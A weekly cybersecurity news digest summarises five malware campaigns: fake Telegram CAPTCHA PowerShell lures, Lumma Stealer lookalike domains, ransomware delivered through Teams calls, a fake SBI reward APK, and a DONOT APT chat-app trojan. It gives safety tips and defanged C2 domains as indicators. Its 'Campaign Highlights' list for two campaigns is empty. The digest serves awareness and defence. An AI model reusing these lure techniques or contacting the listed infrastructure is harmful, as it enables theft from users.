Cyber Security News from 18th to 24th Jan

Telegram captcha tricks you into running malicious PowerShell scripts

Cybercriminals are leveraging fake Ross Ulbricht accounts on X to lure users into malicious Telegram channels. These channels trick victims into running PowerShell commands disguised as "identity verification" processes, ultimately infecting their devices with malware.

The attack mimics a CAPTCHA system and uses carefully crafted language to avoid suspicion. The malicious code downloads a ZIP file containing a potential Cobalt Strike loader, often a precursor to ransomware or data theft.

Stay Safe:

• Never run PowerShell commands or anything copied online without verifying its source.
• Analyze suspicious content in a text reader; obfuscated code is a red flag.

Stay vigilant and protect your devices!

Source: The Bleeping Computer

1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware

Cybercriminals are using fake domains resembling trusted platforms like Reddit and WeTransfer to distribute Lumma Stealer, a potent malware designed to steal sensitive data, including passwords, browser details, and cryptocurrency wallets.

The malware, operating on a Malware-as-a-Service (MaaS) model, uses phishing tactics like fake CAPTCHA pages to trick users into executing PowerShell scripts, enabling data theft. These domains often feature valid SSL certificates, exploiting users' trust in secure connections.

Stay Safe:

• Double-check URLs for authenticity before entering sensitive information.
• Use Two-Factor Authentication (2FA) for added protection.
• Stay informed about phishing tactics to avoid falling victim.

Cybersecurity awareness is key to combating this growing threat. Stay vigilant!

Source : The Cyber Security News

Threat Actors Delivering Ransomware Via Microsoft Teams Using Voice Calls

Sophos MDR has identified two ransomware campaigns, STAC5143 and STAC5777, exploiting Microsoft Teams' default settings, which allow external users to contact internal ones.

Key Tactics Used:

• Email Bombing: Flooding targets with up to 3,000 spam emails in an hour.
• Social Engineering: Impersonating IT support to initiate Teams calls.
• Remote Access: Guiding victims to install Quick Assist or use Teams' remote control.
• Malware Deployment: Delivering malicious payloads once access is gained.

Campaign Highlights:

1. STAC5143:
2. STAC5777:

Recommendations:

• Restrict external Teams calls.
• Limit remote access tools like Quick Assist.
• Use Microsoft Office 365 integration for enhanced monitoring.
• Leverage Sophos detections for malware like ATK/RPivot-B and Python/Kryptic.

Stay vigilant to prevent these sophisticated attacks.

Source : The Cyber Security News

Beware! Fake SBI Reward APK Attacking Users To Deliver Android Malware

Cybersecurity experts have uncovered a new Android malware campaign using a fake SBI Reward app to deceive users via WhatsApp messages.

Key Highlights:

• Lure: Victims are promised ?9,980 in reward points about to expire.
• Distribution: A malicious APK file, "SBI REWARDZ POINT 1.apk," is shared via WhatsApp.
• Permissions: The app requests excessive permissions, including SMS, contacts, and storage, often abused by malware.

Technical Details:

• C2 Servers: Connects to wss://socket.missyou9[.]in and https://superherocloud[.]com to exfiltrate sensitive data like device details, SIM info, and mobile numbers.
• Phishing Tactics: Mimics SBI login pages to steal credentials, card details, and OTPs.
• Detection: Flagged as a trojan by 25 antivirus engines on VirusTotal.

Risks:

Victims face potential financial loss and unauthorized access to sensitive banking information.

Recommendations:

• Avoid downloading APKs from unverified sources.
• Verify suspicious messages with official bank channels.
• Only install apps from trusted platforms like the Google Play Store.
• Use antivirus software and be cautious of urgent reward claims.

Stay vigilant and protect your banking information.

Source : The Cyber Security News

New Android Malware Mimics Chat App to Steal Sensitive Data

Cybersecurity researchers at Cyfirma have uncovered a malware campaign targeting users in South Asia, particularly in Kashmir.

Key Highlights:

• Malware Disguise: Poses as a chat app called "Tanzeem," attributed to the APT group ‘DONOT,’ believed to support Indian interests.
• Behavior: The app ceases to function after installation and requests extensive permissions to access sensitive data.
• Target Audience: Likely aimed at specific individuals or groups within and outside India.

Technical Details:

• Delivery Method: Misuses OneSignal to send phishing links via push notifications.
• Permissions: Accesses call logs, contacts, SMS, file storage, precise location, emails, and usernames.
• Capabilities: Captures keystrokes, system info, screen recordings, and enumerates files.
• Indicators of Compromise: Includes SHA-256 hash and C2 domains like toolgpt[.]buzz and updash[.]info.

Threat Actor:

The DONOT APT group has a history of targeting government and military entities in South Asia, showcasing evolving tactics.

Recommendations:

• Avoid installing apps from unverified sources.
• Be cautious of apps requesting extensive permissions.
• Organizations in the region should strengthen security measures against advanced threats.

Stay vigilant against this evolving cyber threat.

Source : The Cyber Security News